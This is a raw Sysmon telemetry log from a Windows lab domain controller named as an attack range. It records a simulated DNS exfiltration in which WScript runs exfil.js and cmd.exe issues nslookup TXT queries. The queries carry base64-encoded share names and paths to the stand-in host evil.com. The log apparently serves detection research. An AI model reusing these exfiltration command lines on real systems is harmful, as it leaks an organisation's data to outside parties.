14:21:29.912{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208341Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.912{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208340Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.912{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208339Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.912{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000208338Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.623{00000000-0000-0000-0000-000000000000}2628<unknown process>-udptruefalse127.0.0.1-50587-false127.0.0.1-53domain 10341000x8000000000000000208337Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.912{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-6543-000000005F02}1700C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208336Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.896{2E1864BB-18E9-629A-6343-000000005F02}3127712C:\Windows\system32\cmd.exe{2E1864BB-18E9-629A-6543-000000005F02}1700C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208335Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.911{2E1864BB-18E9-629A-6543-000000005F02}1700C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E9-629A-6343-000000005F02}312C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqzva.tmp 2>&1 354300x8000000000000000208334Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.623{00000000-0000-0000-0000-000000000000}2628<unknown process>-udpfalsefalse127.0.0.1-50586-false127.0.0.1-53domain 354300x8000000000000000208333Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.622{00000000-0000-0000-0000-000000000000}2628<unknown process>-udptruefalse127.0.0.1-50586-false127.0.0.1-53domain 354300x8000000000000000208332Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.622{00000000-0000-0000-0000-000000000000}2628<unknown process>-udpfalsefalse127.0.0.1-50585-false127.0.0.1-53domain 354300x8000000000000000208331Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.622{00000000-0000-0000-0000-000000000000}2628<unknown process>-udptruefalse127.0.0.1-50585-false127.0.0.1-53domain 354300x8000000000000000208330Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.555{00000000-0000-0000-0000-000000000000}7036<unknown process>-udpfalsefalse127.0.0.1-50584-false127.0.0.1-53domain 10341000x8000000000000000208329Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.880{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E9-629A-6443-000000005F02}2388C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208328Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.880{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E9-629A-6443-000000005F02}2388C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208327Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.880{2E1864BB-18E9-629A-6443-000000005F02}23885208C:\Windows\system32\conhost.exe{2E1864BB-18E9-629A-6343-000000005F02}312C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208326Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.877{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-6443-000000005F02}2388C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208325Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.858{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208324Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.858{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208323Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.858{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208322Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.858{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208321Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.858{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-6343-000000005F02}312C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208320Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.858{2E1864BB-18E0-629A-6742-000000005F02}39767028C:\Windows\System32\WScript.exe{2E1864BB-18E9-629A-6343-000000005F02}312C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208319Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.871{2E1864BB-18E9-629A-6343-000000005F02}312C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqzva.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000208318Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.858{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlyvpxq.tmpMD5=CB596D298926BB7548136A14BD30FF7C,SHA256=F828C268F75B06BE1AA98CB1BF6D08702D0B68C46C1A2B67F8CB9ED67478BB62,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000208317Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.843{2E1864BB-18E9-629A-6143-000000005F02}79123796C:\Windows\system32\conhost.exe{2E1864BB-18E9-629A-6243-000000005F02}7224C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208316Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.843{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208315Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.843{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208314Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.843{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208313Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.843{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208312Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.843{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-6243-000000005F02}7224C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208311Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.843{2E1864BB-18E9-629A-6043-000000005F02}35006556C:\Windows\system32\cmd.exe{2E1864BB-18E9-629A-6243-000000005F02}7224C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208310Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.846{2E1864BB-18E9-629A-6243-000000005F02}7224C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E9-629A-6043-000000005F02}3500C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyvpxq.tmp 2>&1 22542200x8000000000000000208309Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.976{00000000-0000-0000-0000-000000000000}5552evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000208308Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.913{00000000-0000-0000-0000-000000000000}6372evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000208307Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.853{00000000-0000-0000-0000-000000000000}3552evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000208306Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.790{00000000-0000-0000-0000-000000000000}4288evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000208305Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.722{00000000-0000-0000-0000-000000000000}5960evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000208304Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.664{00000000-0000-0000-0000-000000000000}7616evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000208303Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.603{00000000-0000-0000-0000-000000000000}7084evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000208302Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.350{00000000-0000-0000-0000-000000000000}6076evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000208301Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 